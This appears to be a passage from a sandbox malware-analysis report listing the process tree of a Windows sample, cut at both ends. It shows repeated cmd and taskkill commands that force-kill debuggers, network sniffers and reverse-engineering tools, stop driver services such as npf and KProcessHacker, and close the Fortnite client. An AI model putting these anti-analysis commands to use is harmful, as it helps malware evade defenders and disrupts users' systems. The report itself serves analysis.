  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4884
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Kills process with taskkill
    PID:2340
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1016
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:2532
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:2848
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:3140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:572
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T
    3⤵
    PID:2416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:3248
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Kills process with taskkill
    PID:916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1780
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T
    3⤵
    PID:4184
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4680
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:1260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1408
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T
    3⤵
    PID:4800
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:3968
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:1404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3640
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
    3⤵
    PID:3132
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:2428
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq die*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2152
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq die*" /IM * /F /T
    3⤵
    PID:4516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2320
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:2244
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:3960
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:3900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:3636
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:2092
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebugger.exe >nul 2>&1
  2⤵
  PID:3160
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebugger.exe
    3⤵
    PID:2208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4988
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:5008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FolderChangesView.exe >nul 2>&1
  2⤵
  PID:4868
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FolderChangesView.exe
    3⤵
    PID:4932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:1212
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:5100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HttpDebuggerSdk >nul 2>&1
  2⤵
  PID:1576
- - C:\Windows\system32\sc.exe
    sc stop HttpDebuggerSdk
    3⤵
    - Launches sc.exe
    PID:5068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop npf >nul 2>&1
  2⤵
  PID:2688
- - C:\Windows\system32\sc.exe
    sc stop npf
    3⤵
    - Launches sc.exe
    PID:4624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:1312
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4948
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:1264
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    PID:100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:1836
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:3280
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:2360
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:1560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4744
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:5080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
  2⤵
  PID:500
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Ida64.exe
    3⤵
    PID:4372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:1856
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4480
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
  2⤵
  PID:4052
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OllyDbg.exe
    3⤵
    PID:3144
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4712
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:2884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
  2⤵
  PID:2860
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg64.exe
    3⤵
    PID:3012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:2000
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
  2⤵
  PID:988
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im Dbg32.exe
    3⤵
    PID:4672
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2532
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4024
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:4608
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:2736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:1684
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:1168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1148
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:2960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4184
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:1780
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4844
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:4680
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4800
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:1408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1832
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:3968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:1844
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    - Kills process with taskkill
    PID:3132
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:2740
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    PID:3272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4584
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:2268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:608
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:4516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:1808
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:2244
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:3856
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:3900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3960
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    - Kills process with taskkill
    PID:4916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4580
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:1112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:3160
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4660
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4896
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:4968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4868
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:5068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2468
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:5100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4144
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1144
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T
    3⤵
    PID:4300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:2904
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2544
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T
    3⤵
    PID:448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2016
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:3268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:956
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T
    3⤵
    PID:1160
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:2636
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:1612
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3748
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
    3⤵
    PID:3508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4732
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:1664
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:2860
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4740
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
    3⤵
    PID:664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2280
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:3140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq charles*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4672
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq charles*" /IM * /F /T
    3⤵
    PID:988
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4856
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:3684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2452
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:1168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ida*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2084
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq ida*" /IM * /F /T
    3⤵
    PID:4476
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:3488
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1800
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:3492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:1260
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:2424
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:2504
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:5028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1832
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:5112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:3272
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:2740
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:2420
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    PID:4584
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&1
  2⤵
  PID:2152
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerProSdk
    3⤵
    - Launches sc.exe
    PID:1980
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:5040
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:2320
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&1
  2⤵
  PID:2180
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker3
    3⤵
    PID:2536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4908
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&1
  2⤵
  PID:2804
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker2
    3⤵
    - Launches sc.exe
    PID:4528
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&1
  2⤵
  PID:1092
- - C:\Windows\system32\sc.exe
    sc stop KProcessHacker1
    3⤵
    - Launches sc.exe
    PID:456
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:1044
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop wireshark >nul 2>&1
  2⤵
  PID:2264
- - C:\Windows\system32\sc.exe
    sc stop wireshark
    3⤵
    PID:2192
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:1180
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:4868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
  2⤵
  PID:1576
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerUI.exe
    3⤵
    PID:4304
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:1420
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
  2⤵
  PID:2472
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im HTTPDebuggerSvc.exe
    3⤵
    PID:3816
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:5104
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c color 1
  2⤵
  PID:4724
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:892
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    - Kills process with taskkill
    PID:1676
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c color 1
  2⤵
  PID:448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
  2⤵
  PID:2360
- - C:\Windows\system32\sc.exe
    sc stop HTTPDebuggerPro
    3⤵
    - Launches sc.exe
    PID:828
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:4064
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:4480
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
  2⤵
  PID:936
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
    3⤵
    PID:4140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
  2⤵
  PID:3508
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
    3⤵
    PID:3144
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4712
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:3748
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1476
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
    3⤵
    PID:3140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:1016
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:1228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:3980
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:1168
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T
    3⤵
    PID:4856
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:4964
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T
    3⤵
    PID:2084
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1
  2⤵
  PID:1148
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im EpicGamesLauncher.exe
    3⤵
    PID:3488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2404
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T
    3⤵
    PID:4752
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1
  2⤵
  PID:4332
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im FortniteClient-Win64-Shipping.exe
    3⤵
    PID:3556
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
  2⤵
  PID:2504
- - C:\Windows\system32\taskkill.exe
    taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
    3⤵
    PID:4324
- C:\Windows\system32\cmd.exe
